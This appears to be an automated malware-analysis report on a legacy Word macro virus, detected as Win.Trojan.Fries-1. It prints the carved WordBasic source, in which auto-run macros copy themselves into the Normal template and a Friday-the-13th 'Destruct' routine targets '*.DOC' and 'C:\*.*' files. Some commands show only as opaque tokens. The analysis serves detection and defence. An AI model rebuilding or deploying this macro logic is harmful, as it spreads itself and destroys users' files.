MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as a legacy WordBasic macro virus, specifically a "RSN MACRO VIRUS Goat file". This indicates the presence of malicious macros intended to execute arbitrary code. The ClamAV detection further confirms its malicious nature as Win.Trojan.Fries-1. The document body contains numerous macro-related keywords and function names, reinforcing the macro execution attack vector.
Heuristics 3
-
ClamAV: Win.Trojan.Fries-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Fries-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCEThe Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
wordbasic_macros.txt |
wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 3651 bytes |
SHA-256: 92b7aac73cd4a5322a225462ecd9d275e59a36c008ac5c056de2936418e93843 |
|||
Preview scriptFirst 1,000 lines of the extracted script
= @cmd6e69 29551 = MAIN @cmd809e 1 t1 = @cmd80f7 t = t1 = @cmd8100 "0:00:03" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd80b3 Alarm$ , "Begin" Kor1$ Argument s$ = @cmd80ea @cmd8007 Argument Argument 10 s$ = "0" = s$ Kor1$ = s$ MAIN @cmd809e 1 True = 1 False = 0 Flag_v = False Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True name$ = "Fri13" Flag_v = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t @cmd80b3 Alarm$ , = Flag_v = False dlg2 @cmd004e dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2 Move "AutoOpen" , "AutoOpenf" , name$ , norm$ Move "Begin" , "Beginf" , name$ , norm$ Move "AutoClosex" , "AutoClose" , name$ , norm$ Move "AutoOpenx" , "AutoOpen" , name$ , norm$ Move "AutoOpenx" , "AutoNew" , name$ , norm$ Move "Fri13x" , "Fri13" , name$ , norm$ t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t @cmd00d1 = 0 @cmd80b3 Alarm$ , "Fri13" Move inp$ , outp$ , name$ , norm$ @cmd00de , = name$ , = norm$ , = inp$ , = 3 @cmd00de , = norm$ , = inp$ , = outp$ , = 3 MAIN True = 1 False = 0 dlg2 @cmd004e Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , = @cmd8023 = True @cmd80b7 1 = 0 @cmd0054 = 1 dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 DelMacro "AutoOpen" , name$ DelMacro "Begin" , name$ DelMacro "AutoClosex" , name$ DelMacro "AutoOpenx" , name$ DelMacro "Fri13x" , name$ dlg2 name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2 MoveD "Beginf" , "Begin" , norm$ , name$ MoveD "AutoClose" , "AutoClosex" , norm$ , name$ MoveD "AutoOpen" , "AutoOpenx" , norm$ , name$ MoveD "AutoOpenf" , "AutoOpen" , norm$ , name$ MoveD "Fri13" , "Fri13x" , norm$ , name$ t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , "Fri13" MoveD inp$ , outp$ , nameinp$ , nameout$ @cmd00de , = nameinp$ , = nameout$ , = inp$ , = 3 @cmd00de , = nameout$ , = inp$ , = outp$ , = 3 DelMacro NameMscro$ , NameOut$ True = 1 False = 0 Flag_i = False count = 1 @cmd80b7 1 name$ = @cmd80b8 count , 1 name$ = NameMscro$ Flag_i = True count Flag_i = True @cmd00de , = NameOut$ , = NameMscro$ , = 3 MAIN True = 1 False = 0 Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , = t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t @cmd80b3 Alarm$ , "Fri13" MAIN @cmd809e 1 True = 1 False = 0 zader$ = "0:01:00" Flag_i = False count = 1 @cmd80b7 0 name$ = @cmd80b8 count , 0 name$ = = Flag_i = True count t1 = @cmd80f7 Flag_i = True t = t1 = @cmd8100 "0:00:32" Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd80b3 Alarm$ , = t = t1 = @cmd8100 zader$ Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t @cmd803a 0 Destruct @cmd80b3 Alarm$ , "Fri13" Kor1$ Argument s$ = @cmd80ea @cmd8007 Argument Argument 10 s$ = "0" = s$ Kor1$ = s$ Destruct @cmd80f8 @cmd80f7 = 6 @cmd80f2 @cmd80f7 = 13 @cmd809e 1 @cmd80ab "*.DOC" @cmd80ab "C:\*.*" @cmd802b = @cmd8005 10 = @cmd8005 13 = = @cmd8005 10 = @cmd8005 13 = , , 64 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.